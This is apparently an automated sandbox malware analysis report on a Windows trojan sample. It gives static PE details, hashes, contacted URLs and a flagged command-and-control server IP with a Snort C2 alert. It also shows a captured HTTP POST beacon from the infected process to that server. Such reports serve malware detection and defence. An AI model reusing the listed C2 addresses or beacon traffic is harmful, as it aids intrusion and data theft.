https://instagram.com/hiddencity_	svchost.exe, 00000006.00000003.753653199.0000027873F79000.00000004.00000001.sdmp, svchost.exe, 00000006.00000003.753689942.0000027873F58000.00000004.00000001.sdmp	false		high
https://watson.telemet:443/0SatF/P7qctngEpv1Ya3fD3/jr1xjmE/NHdOxCQtbKORku0/xlzXExMFhF/ibPm1TBkGiQpYm	sort.exe, 00000001.00000002.932252355.0000000002A7F000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://www.roblox.com/info/privacy	svchost.exe, 00000006.00000003.758203492.0000027873F2A000.00000004.00000001.sdmp, svchost.exe, 00000006.00000003.758104226.0000027873F6B000.00000004.00000001.sdmp	false		high
http://www.g5e.com/termsofservice	svchost.exe, 00000006.00000003.753653199.0000027873F79000.00000004.00000001.sdmp, svchost.exe, 00000006.00000003.753689942.0000027873F58000.00000004.00000001.sdmp	false		high
https://en.help.roblox.com/hc/en-us	svchost.exe, 00000006.00000003.758203492.0000027873F2A000.00000004.00000001.sdmp, svchost.exe, 00000006.00000003.758104226.0000027873F6B000.00000004.00000001.sdmp	false		high
https://corp.roblox.com/parents/	svchost.exe, 00000006.00000003.758203492.0000027873F2A000.00000004.00000001.sdmp, svchost.exe, 00000006.00000003.758104226.0000027873F6B000.00000004.00000001.sdmp, svchost.exe, 00000006.00000003.758139074.0000027873F62000.00000004.00000001.sdmp	false		high
https://www.hulu.com/ca-privacy-rights	svchost.exe, 00000006.00000003.752710199.0000027873F8F000.00000004.00000001.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
200.116.145.225	unknown	Colombia		13489	EPMTelecomunicacionesSAESPCO	true

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	31.0.0 Red Diamond
Analysis ID:	319735
Start date:	18.11.2020
Start time:	15:59:41
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 7m 38s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	2ojdmC51As.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	14
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal80.troj.evad.winEXE@6/0@0/2
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 65.4% (good quality ratio 64.7%) Quality average: 85% Quality standard deviation: 22.1%
HCA Information:	Successful, ratio: 86% Number of executed functions: 57 Number of non-executed functions: 353
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 168.61.161.212, 13.88.21.125, 51.104.139.180, 52.155.217.156, 20.54.26.129, 67.26.137.254, 8.241.11.126, 8.248.133.254, 8.253.204.249, 8.253.204.121, 92.122.213.247, 92.122.213.194, 51.11.168.160 Excluded domains from analysis (whitelisted): displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, arc.msn.com.nsatc.net, db3p-ris-pf-prod-atm.trafficmanager.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, ctldl.windowsupdate.com, a1449.dscg2.akamai.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, ris.api.iris.microsoft.com, umwatsonrouting.trafficmanager.net, audownload.windowsupdate.nsatc.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, auto.au.download.windowsupdate.com.c.footprint.net, img-prod-cms-rt-microsoft-com.akamaized.net, skypedataprdcolwus15.cloudapp.net, au-bg-shim.trafficmanager.net Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryValueKey calls found. VT rate limit hit for: /opt/package/joesandbox/database/analysis/319735/sample/2ojdmC51As.exe

Simulations

Behavior and APIs

Time	Type	Description
16:01:17	API Interceptor	10x Sleep call for process: svchost.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
200.116.145.225	GM8716863026AA.doc	Get hash	malicious	Browse	200.116.145.225:443/eHRi0AsvmChNb0B/Sq2LBDG3K/dHE8SMLlJOlFGym/g6iocDdP0QPHR/

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
EPMTelecomunicacionesSAESPCO	A8732vSTKW.exe	Get hash	malicious	Browse	181.129.134.18
	pIxnU8KH8P.exe	Get hash	malicious	Browse	181.129.134.18
	4UwAHMfQ1s.exe	Get hash	malicious	Browse	181.129.104.139
	8vjs9LBNaU.exe	Get hash	malicious	Browse	181.129.134.18
	zL474n0Mst.exe	Get hash	malicious	Browse	200.116.145.225
	z9dSgDlbe1.exe	Get hash	malicious	Browse	200.116.145.225
	0FzZuRH6Gy.exe	Get hash	malicious	Browse	200.116.145.225
	JdjCbjCf.exe	Get hash	malicious	Browse	201.232.179.81
	qwhWqUYlnN.exe	Get hash	malicious	Browse	181.143.194.138
	7U0Y1bRt9b.exe	Get hash	malicious	Browse	200.116.232.186
	zLjBdL6Lbk.exe	Get hash	malicious	Browse	181.129.93.226
	GM8716863026AA.doc	Get hash	malicious	Browse	200.116.145.225
	a.exe	Get hash	malicious	Browse	200.122.209.78
	SecuriteInfo.com.Trojan.GenericKDZ.69690.30809.exe	Get hash	malicious	Browse	181.129.104.139
	SecuriteInfo.com.Trojan.GenericKDZ.69690.25514.exe	Get hash	malicious	Browse	181.129.134.18
	Archivo Pdf.exe	Get hash	malicious	Browse	181.140.213.213
	14082020 PDF.exe	Get hash	malicious	Browse	181.140.213.213
	Solicitud.exe	Get hash	malicious	Browse	181.140.213.213
	CITA FISCAL N#U00ba 00964673335 15 ABRIL DE 2020.exe	Get hash	malicious	Browse	181.141.10.15
	9459cddst.exe	Get hash	malicious	Browse	200.116.232.186

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

No created / dropped files found

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.0032331918802715
TrID:	Win32 Executable (generic) a (10002005/4) 99.83% Windows Screen Saver (13104/52) 0.13% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	2ojdmC51As.exe
File size:	376832
MD5:	5804d97670dcdfab88ba830682355dad
SHA1:	65c817fb511824fa185f34ecd744b836ed7a19eb
SHA256:	4e885ada930e285a005c5211b8a652dc0eb11a06ccf530561afa88aefe99c9fc
SHA512:	befd479d37ff5bef768d61aeec101b4f584e8519f4b3d60f6f0692614ce8925a8303ae478b4d21652b64bc36bc38e9df2eb44d874c2f973f310f2e8ff2a0c7a4
SSDEEP:	6144:HzoTjUrx4KVHa9eUfTLHy2VrH0D+wieIMl7lT2IcO/wksAPJLzx:ToCHVcjZwie57l6i/wi
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........!..`r..`r..`r..`r..`r..sr..`r..as..`r..arC.`rp.nr..`r..jr..`r..kr..`rK.fr..`rRich..`r................PE..L......_...........

File Icon


Icon Hash:	71b018ccc6577131

Static PE Info

General
Entrypoint:	0x406388
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp:	0x5F920784 [Thu Oct 22 22:28:20 2020 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	875a1634331d344707689db6d9489063

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
push FFFFFFFFh
push 0042F100h
push 00409800h
mov eax, dword ptr fs:[00000000h]
push eax
mov dword ptr fs:[00000000h], esp
sub esp, 58h
push ebx
push esi
push edi
mov dword ptr [ebp-18h], esp
call dword ptr [0042B2CCh]
xor edx, edx
mov dl, ah
mov dword ptr [00439D04h], edx
mov ecx, eax
and ecx, 000000FFh
mov dword ptr [00439D00h], ecx
shl ecx, 08h
add ecx, edx
mov dword ptr [00439CFCh], ecx
shr eax, 10h
mov dword ptr [00439CF8h], eax
push 00000001h
call 00007F25005A0C0Eh
pop ecx
test eax, eax
jne 00007F250059F68Ah
push 0000001Ch
call 00007F250059F748h
pop ecx
call 00007F25005A2079h
test eax, eax
jne 00007F250059F68Ah
push 00000010h
call 00007F250059F737h
pop ecx
xor esi, esi
mov dword ptr [ebp-04h], esi
call 00007F25005A28B2h
call dword ptr [0042B1D0h]
mov dword ptr [0043B87Ch], eax
call 00007F25005A2770h
mov dword ptr [00439CE8h], eax
call 00007F25005A2519h
call 00007F25005A245Bh
call 00007F250059F86Ch
mov dword ptr [ebp-30h], esi
lea eax, dword ptr [ebp-5Ch]
push eax
call dword ptr [0042B1D4h]
call 00007F25005A23ECh
mov dword ptr [ebp-64h], eax
test byte ptr [ebp-30h], 00000001h
je 00007F250059F688h
movzx eax, word ptr [ebp+00h]

Rich Headers

Programming Language:

[ C ] VS98 (6.0) build 8168
[RES] VS98 (6.0) cvtres build 1720
[C++] VS98 (6.0) build 8168

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x33a68	0xb4	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x3c000	0x23812	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2b000	0x5c8	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x29ef1	0x2a000	False	0.574718656994	data	6.56296579611	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x2b000	0xa8be	0xb000	False	0.309792258523	data	4.42786700159	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x36000	0x5890	0x2000	False	0.253784179688	data	3.64382398996	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x3c000	0x23812	0x24000	False	0.909579806858	data	7.73501222548	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_CURSOR	0x3c8e0	0x134	data	English	United States
RT_CURSOR	0x3ca14	0xb4	data	English	United States
RT_CURSOR	0x3cac8	0x134	data	English	United States
RT_CURSOR	0x3cbfc	0xb4	data	English	United States
RT_ICON	0x3ccb0	0x2e8	dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 67108992, next used block 3293332676	English	United States
RT_ICON	0x3cf98	0x128	GLS_BINARY_LSB_FIRST	English	United States
RT_ICON	0x3d0c0	0x2e8	data	English	United States
RT_ICON	0x3d3a8	0x128	GLS_BINARY_LSB_FIRST	English	United States
RT_MENU	0x3d4d0	0x23e	data	English	United States
RT_STRING	0x3d710	0x90	data	English	United States
RT_STRING	0x3d7a0	0x3e	data	English	United States
RT_STRING	0x3d7e0	0x296	data	English	United States
RT_STRING	0x3da78	0x260	data	English	United States
RT_STRING	0x3dcd8	0x328	data	English	United States
RT_STRING	0x3e000	0x70	data	English	United States
RT_STRING	0x3e070	0x106	data	English	United States
RT_STRING	0x3e178	0xda	data	English	United States
RT_STRING	0x3e254	0x46	data	English	United States
RT_STRING	0x3e29c	0xc6	data	English	United States
RT_STRING	0x3e364	0x1f8	data	English	United States
RT_STRING	0x3e55c	0x86	data	English	United States
RT_STRING	0x3e5e4	0xd0	data	English	United States
RT_STRING	0x3e6b4	0x2a	data	English	United States
RT_STRING	0x3e6e0	0x14a	data	English	United States
RT_STRING	0x3e82c	0x124	data	English	United States
RT_STRING	0x3e950	0x4e2	data	English	United States
RT_STRING	0x3ee34	0x2a2	data	English	United States
RT_STRING	0x3f0d8	0x2dc	data	English	United States
RT_STRING	0x3f3b4	0xac	data	English	United States
RT_STRING	0x3f460	0xde	data	English	United States
RT_STRING	0x3f540	0x4c4	data	English	United States
RT_STRING	0x3fa04	0x264	data	English	United States
RT_STRING	0x3fc68	0x2c	data	English	United States
RT_ACCELERATOR	0x3fc94	0x70	data	English	United States
RT_ACCELERATOR	0x3fd04	0x18	data	English	United States
RT_RCDATA	0x3fd1c	0x1f733	data	English	United States
RT_GROUP_CURSOR	0x5f450	0x22	Lotus unknown worksheet or configuration, revision 0x2	English	United States
RT_GROUP_CURSOR	0x5f474	0x22	Lotus unknown worksheet or configuration, revision 0x2	English	United States
RT_GROUP_ICON	0x5f498	0x22	data	English	United States
RT_GROUP_ICON	0x5f4bc	0x22	data	English	United States
RT_VERSION	0x5f4e0	0x314	data	English	United States
None	0x5f7f4	0x1e	data	English	United States

Imports

DLL	Import
KERNEL32.dll	VirtualFree, IsBadWritePtr, UnhandledExceptionFilter, FreeEnvironmentStringsA, FreeEnvironmentStringsW, GetEnvironmentStrings, GetEnvironmentStringsW, SetHandleCount, GetStdHandle, GetFileType, SetUnhandledExceptionFilter, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, HeapCreate, IsBadCodePtr, SetStdHandle, CompareStringA, CompareStringW, SetEnvironmentVariableA, HeapDestroy, GetACP, HeapSize, HeapReAlloc, RaiseException, TerminateProcess, ExitProcess, GetCommandLineA, GetStartupInfoA, HeapFree, InterlockedExchange, GetLocalTime, GetSystemTime, GetTimeZoneInformation, RtlUnwind, HeapAlloc, FileTimeToLocalFileTime, FileTimeToSystemTime, SetErrorMode, SystemTimeToFileTime, LocalFileTimeToFileTime, GetFileSize, GetVolumeInformationA, FindFirstFileA, FindClose, DeleteFileA, MoveFileA, SetEndOfFile, UnlockFile, LockFile, FlushFileBuffers, SetFilePointer, WriteFile, ReadFile, CreateFileA, DuplicateHandle, GetOEMCP, GetCPInfo, GetProcessVersion, WritePrivateProfileStringA, TlsGetValue, LocalReAlloc, TlsSetValue, EnterCriticalSection, GlobalReAlloc, LeaveCriticalSection, TlsFree, GlobalHandle, DeleteCriticalSection, TlsAlloc, InitializeCriticalSection, LocalFree, LocalAlloc, WideCharToMultiByte, InterlockedIncrement, GlobalFlags, InterlockedDecrement, GetLastError, SetLastError, MulDiv, lstrlenA, MultiByteToWideChar, GetDiskFreeSpaceA, GetFileTime, SetFileTime, GetFullPathNameA, GetTempFileNameA, lstrcpynA, GetFileAttributesA, FreeLibrary, GetVersion, lstrcatA, GlobalGetAtomNameA, GlobalAddAtomA, GlobalFindAtomA, lstrcpyA, GetModuleHandleA, CloseHandle, GetModuleFileNameA, GlobalAlloc, GlobalDeleteAtom, lstrcmpiA, GetCurrentThread, GetCurrentThreadId, lstrcmpA, GlobalLock, GlobalUnlock, GlobalFree, LockResource, FindResourceA, LoadResource, GetTickCount, Sleep, LoadLibraryA, VirtualAlloc, GetModuleHandleExA, GetProcAddress, GetCurrentProcess, IsBadReadPtr
USER32.dll	TranslateAcceleratorA, ReleaseCapture, GetDesktopWindow, DestroyMenu, LoadMenuA, SetMenu, ReuseDDElParam, UnpackDDElParam, BringWindowToTop, ClientToScreen, GetWindowDC, BeginPaint, EndPaint, TabbedTextOutA, DrawTextA, GrayStringA, IsZoomed, SetParent, IsRectEmpty, AppendMenuA, DeleteMenu, GetSystemMenu, GetClassNameA, GetSysColorBrush, LoadStringA, CharUpperA, FindWindowA, GetTabbedTextExtentA, KillTimer, WindowFromPoint, InflateRect, SetCapture, InvertRect, GetDCEx, LockWindowUpdate, GetDC, ReleaseDC, LoadCursorA, DestroyCursor, ShowWindow, SetWindowTextA, IsDialogMessageA, SetDlgItemTextA, LoadIconA, UpdateWindow, SendDlgItemMessageA, MapWindowPoints, GetSysColor, SetFocus, AdjustWindowRectEx, ScreenToClient, EqualRect, DeferWindowPos, BeginDeferWindowPos, CopyRect, EndDeferWindowPos, ScrollWindow, GetScrollInfo, LoadAcceleratorsA, ShowScrollBar, GetScrollRange, SetScrollRange, GetScrollPos, SetScrollPos, GetTopWindow, IsChild, GetCapture, WinHelpA, wsprintfA, GetClassInfoA, RegisterClassA, GetMenu, GetMenuItemCount, GetSubMenu, GetWindowTextLengthA, GetWindowTextA, GetDlgCtrlID, DefWindowProcA, CreateWindowExA, GetClassLongA, SetPropA, UnhookWindowsHookEx, GetPropA, CallWindowProcA, RemovePropA, GetMessageTime, GetMessagePos, GetForegroundWindow, SetForegroundWindow, GetWindow, SetWindowLongA, SetWindowPos, RegisterWindowMessageA, OffsetRect, IntersectRect, SystemParametersInfoA, IsIconic, GetWindowPlacement, GetWindowRect, GetMenuCheckMarkDimensions, GetMenuState, ModifyMenuA, SetMenuItemBitmaps, CheckMenuItem, EnableMenuItem, GetFocus, GetKeyState, CallNextHookEx, ValidateRect, IsWindowVisible, GetCursorPos, SetWindowsHookExA, GetLastActivePopup, MessageBoxA, SetCursor, ShowOwnedPopups, PostMessageA, PostQuitMessage, GetNextDlgTabItem, EndDialog, GetActiveWindow, SetActiveWindow, IsWindow, GetSystemMetrics, CreateDialogIndirectParamA, DestroyWindow, GetParent, GetWindowLongA, GetDlgItem, IsWindowEnabled, SetRectEmpty, PtInRect, FillRect, SetScrollInfo, SetRect, SendMessageA, PeekMessageA, GetMessageA, TranslateMessage, DispatchMessageA, SetTimer, InvalidateRect, GetClientRect, LoadBitmapA, EnableWindow, GetMenuItemID, UnregisterClassA
GDI32.dll	GetDeviceCaps, PatBlt, GetStockObject, Rectangle, DPtoLP, CreatePen, GetViewportOrgEx, AbortDoc, EndDoc, EndPage, StartPage, StartDocA, SetAbortProc, CreateDCA, SaveDC, RestoreDC, SetBkMode, SetPolyFillMode, SetROP2, SetStretchBltMode, SetMapMode, SetViewportOrgEx, OffsetViewportOrgEx, SetViewportExtEx, ScaleViewportExtEx, SetWindowOrgEx, SetWindowExtEx, ScaleWindowExtEx, SelectClipRgn, ExcludeClipRect, IntersectClipRect, MoveToEx, LineTo, SetTextAlign, GetCurrentPositionEx, GetObjectA, CreateRectRgn, GetViewportExtEx, GetWindowExtEx, CreateSolidBrush, CreatePatternBrush, PtVisible, RectVisible, TextOutA, ExtTextOutA, Escape, GetTextExtentPoint32A, GetTextMetricsA, StretchDIBits, GetCharWidthA, CreateFontA, CreateFontIndirectA, LPtoDP, GetBkColor, GetNearestColor, GetTextColor, GetStretchBltMode, GetPolyFillMode, GetTextAlign, GetBkMode, GetROP2, GetTextFaceA, GetWindowOrgEx, SetRectRgn, CombineRgn, CreateRectRgnIndirect, SetTextColor, SetBkColor, GetClipBox, CreateBitmap, CreateCompatibleBitmap, SelectObject, StretchBlt, DeleteObject, DeleteDC, BitBlt, CreateCompatibleDC
comdlg32.dll	GetFileTitleA, PrintDlgA, CommDlgExtendedError, GetSaveFileNameA, GetOpenFileNameA
WINSPOOL.DRV	OpenPrinterA, DocumentPropertiesA, ClosePrinter
ADVAPI32.dll	RegQueryValueExA, RegOpenKeyExA, RegCreateKeyExA, RegCloseKey, GetFileSecurityA, SetFileSecurityA, RegSetValueExA
SHELL32.dll	DragQueryFileA, DragFinish
COMCTL32.dll

Version Infos

Description	Data
LegalCopyright	Copyright (C) 2003
InternalName	EffectDemo
FileVersion	1, 0, 0, 1
CompanyName
LegalTrademarks
ProductName	EffectDemo Application
ProductVersion	1, 0, 0, 1
FileDescription	EffectDemo MFC Application
OriginalFilename	EffectDemo.EXE
Translation	0x0409 0x04b0

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
11/18/20-16:00:56.201479	TCP	2404324	ET CNC Feodo Tracker Reported CnC Server TCP group 13	49742	443	192.168.2.4	200.116.145.225

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 18, 2020 16:00:56.201478958 CET	49742	443	192.168.2.4	200.116.145.225
Nov 18, 2020 16:00:56.396552086 CET	443	49742	200.116.145.225	192.168.2.4
Nov 18, 2020 16:00:56.396764040 CET	49742	443	192.168.2.4	200.116.145.225
Nov 18, 2020 16:00:56.398037910 CET	49742	443	192.168.2.4	200.116.145.225
Nov 18, 2020 16:00:56.398277044 CET	49742	443	192.168.2.4	200.116.145.225
Nov 18, 2020 16:00:56.595930099 CET	443	49742	200.116.145.225	192.168.2.4
Nov 18, 2020 16:00:56.595947981 CET	443	49742	200.116.145.225	192.168.2.4
Nov 18, 2020 16:00:56.783943892 CET	443	49742	200.116.145.225	192.168.2.4
Nov 18, 2020 16:00:57.383925915 CET	443	49742	200.116.145.225	192.168.2.4
Nov 18, 2020 16:00:57.384022951 CET	49742	443	192.168.2.4	200.116.145.225
Nov 18, 2020 16:02:02.399162054 CET	443	49742	200.116.145.225	192.168.2.4
Nov 18, 2020 16:02:02.399306059 CET	49742	443	192.168.2.4	200.116.145.225

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 18, 2020 16:00:33.099268913 CET	52991	53	192.168.2.4	8.8.8.8
Nov 18, 2020 16:00:33.134911060 CET	53	52991	8.8.8.8	192.168.2.4
Nov 18, 2020 16:00:33.932281017 CET	53700	53	192.168.2.4	8.8.8.8
Nov 18, 2020 16:00:33.959232092 CET	53	53700	8.8.8.8	192.168.2.4
Nov 18, 2020 16:00:35.197410107 CET	51726	53	192.168.2.4	8.8.8.8
Nov 18, 2020 16:00:35.224631071 CET	53	51726	8.8.8.8	192.168.2.4
Nov 18, 2020 16:00:35.978636026 CET	56794	53	192.168.2.4	8.8.8.8
Nov 18, 2020 16:00:36.005954027 CET	53	56794	8.8.8.8	192.168.2.4
Nov 18, 2020 16:00:37.021862030 CET	56534	53	192.168.2.4	8.8.8.8
Nov 18, 2020 16:00:37.048950911 CET	53	56534	8.8.8.8	192.168.2.4
Nov 18, 2020 16:00:38.367702007 CET	56627	53	192.168.2.4	8.8.8.8
Nov 18, 2020 16:00:38.394817114 CET	53	56627	8.8.8.8	192.168.2.4
Nov 18, 2020 16:00:39.535403967 CET	56621	53	192.168.2.4	8.8.8.8
Nov 18, 2020 16:00:39.562432051 CET	53	56621	8.8.8.8	192.168.2.4
Nov 18, 2020 16:00:40.350146055 CET	63116	53	192.168.2.4	8.8.8.8
Nov 18, 2020 16:00:40.377121925 CET	53	63116	8.8.8.8	192.168.2.4
Nov 18, 2020 16:00:41.208791018 CET	64078	53	192.168.2.4	8.8.8.8
Nov 18, 2020 16:00:41.237062931 CET	53	64078	8.8.8.8	192.168.2.4
Nov 18, 2020 16:00:42.726011038 CET	64801	53	192.168.2.4	8.8.8.8
Nov 18, 2020 16:00:42.753050089 CET	53	64801	8.8.8.8	192.168.2.4
Nov 18, 2020 16:00:43.777288914 CET	61721	53	192.168.2.4	8.8.8.8
Nov 18, 2020 16:00:43.804213047 CET	53	61721	8.8.8.8	192.168.2.4
Nov 18, 2020 16:00:59.555849075 CET	51255	53	192.168.2.4	8.8.8.8
Nov 18, 2020 16:00:59.583035946 CET	53	51255	8.8.8.8	192.168.2.4
Nov 18, 2020 16:01:16.963365078 CET	61522	53	192.168.2.4	8.8.8.8
Nov 18, 2020 16:01:16.990312099 CET	53	61522	8.8.8.8	192.168.2.4
Nov 18, 2020 16:01:17.522742987 CET	52337	53	192.168.2.4	8.8.8.8
Nov 18, 2020 16:01:17.558396101 CET	53	52337	8.8.8.8	192.168.2.4
Nov 18, 2020 16:01:17.987303019 CET	55046	53	192.168.2.4	8.8.8.8
Nov 18, 2020 16:01:18.022695065 CET	53	55046	8.8.8.8	192.168.2.4
Nov 18, 2020 16:01:18.325546026 CET	49612	53	192.168.2.4	8.8.8.8
Nov 18, 2020 16:01:18.360960007 CET	53	49612	8.8.8.8	192.168.2.4
Nov 18, 2020 16:01:18.643338919 CET	49285	53	192.168.2.4	8.8.8.8
Nov 18, 2020 16:01:18.670428991 CET	53	49285	8.8.8.8	192.168.2.4
Nov 18, 2020 16:01:18.853090048 CET	50601	53	192.168.2.4	8.8.8.8
Nov 18, 2020 16:01:18.888967037 CET	53	50601	8.8.8.8	192.168.2.4
Nov 18, 2020 16:01:19.287672997 CET	60875	53	192.168.2.4	8.8.8.8
Nov 18, 2020 16:01:19.314896107 CET	53	60875	8.8.8.8	192.168.2.4
Nov 18, 2020 16:01:19.729796886 CET	56448	53	192.168.2.4	8.8.8.8
Nov 18, 2020 16:01:19.765239000 CET	53	56448	8.8.8.8	192.168.2.4
Nov 18, 2020 16:01:20.354146004 CET	59172	53	192.168.2.4	8.8.8.8
Nov 18, 2020 16:01:20.381256104 CET	53	59172	8.8.8.8	192.168.2.4
Nov 18, 2020 16:01:21.001224041 CET	62420	53	192.168.2.4	8.8.8.8
Nov 18, 2020 16:01:21.036653996 CET	53	62420	8.8.8.8	192.168.2.4
Nov 18, 2020 16:01:21.382581949 CET	60579	53	192.168.2.4	8.8.8.8
Nov 18, 2020 16:01:21.409843922 CET	53	60579	8.8.8.8	192.168.2.4
Nov 18, 2020 16:01:21.519098043 CET	50183	53	192.168.2.4	8.8.8.8
Nov 18, 2020 16:01:21.546266079 CET	53	50183	8.8.8.8	192.168.2.4
Nov 18, 2020 16:01:33.886970043 CET	61531	53	192.168.2.4	8.8.8.8
Nov 18, 2020 16:01:33.914041042 CET	53	61531	8.8.8.8	192.168.2.4
Nov 18, 2020 16:01:34.217612028 CET	49228	53	192.168.2.4	8.8.8.8
Nov 18, 2020 16:01:34.244699955 CET	53	49228	8.8.8.8	192.168.2.4
Nov 18, 2020 16:01:38.323909044 CET	59794	53	192.168.2.4	8.8.8.8
Nov 18, 2020 16:01:38.360553026 CET	53	59794	8.8.8.8	192.168.2.4
Nov 18, 2020 16:02:10.261842012 CET	55916	53	192.168.2.4	8.8.8.8
Nov 18, 2020 16:02:10.289072037 CET	53	55916	8.8.8.8	192.168.2.4
Nov 18, 2020 16:02:12.596378088 CET	52752	53	192.168.2.4	8.8.8.8
Nov 18, 2020 16:02:12.623620033 CET	53	52752	8.8.8.8	192.168.2.4

HTTP Request Dependency Graph

200.116.145.225

200.116.145.225:443

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.4	49742	200.116.145.225	443	C:\Windows\SysWOW64\setupugc\sort.exe

Timestamp	kBytes transferred	Direction	Data
Nov 18, 2020 16:00:56.398037910 CET	157	OUT	POST /0SatF/P7qctngEpv1Ya3fD3/jr1xjmE/NHdOxCQtbKORku0/xlzXExMFhF/ibPm1TBkGiQpYm/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8 Accept-Encoding: gzip, deflate DNT: 1 Connection: keep-alive Referer: 200.116.145.225/ Upgrade-Insecure-Requests: 1 Content-Type: multipart/form-data; boundary=---------hcIbcONok User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: 200.116.145.225:443 Content-Length: 4628 Cache-Control: no-cache
Nov 18, 2020 16:00:57.383925915 CET	162	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 18 Nov 2020 15:00:57 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 132 Connection: keep-alive Data Raw: 86 2d 97 64 dc 2f f8 df 14 38 07 51 47 c3 82 1e 9f a3 ba c8 d0 2b 43 69 bb 3b 52 61 27 3f 2a 29 23 ca ab b4 0c 87 79 27 e5 f8 12 aa 34 a6 67 1b cb d6 18 b7 d9 cd 1f 7e a9 3e d8 f6 74 85 25 34 ef 26 d3 d4 a7 7d dd 72 9d 53 6e ab e6 41 e3 1b 5d 14 0c 65 04 51 c3 9d 16 cd 48 17 e8 f2 17 79 96 33 16 89 ac 54 9d a3 23 36 b4 bc b1 be 1e e3 7b 1d ff ee 1e 79 1a 06 83 d0 8d 69 25 22 4a 20 90 a6 98 c3 Data Ascii: -d/8QG+Ci;Ra'?*)#y'4g~>t%4&}rSnA]eQHy3T#6{yi%"J

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

Behavior

Click to jump to process

System Behavior

Analysis Process: 2ojdmC51As.exe PID: 6240 Parent PID: 5864

General

Start time:	16:00:37
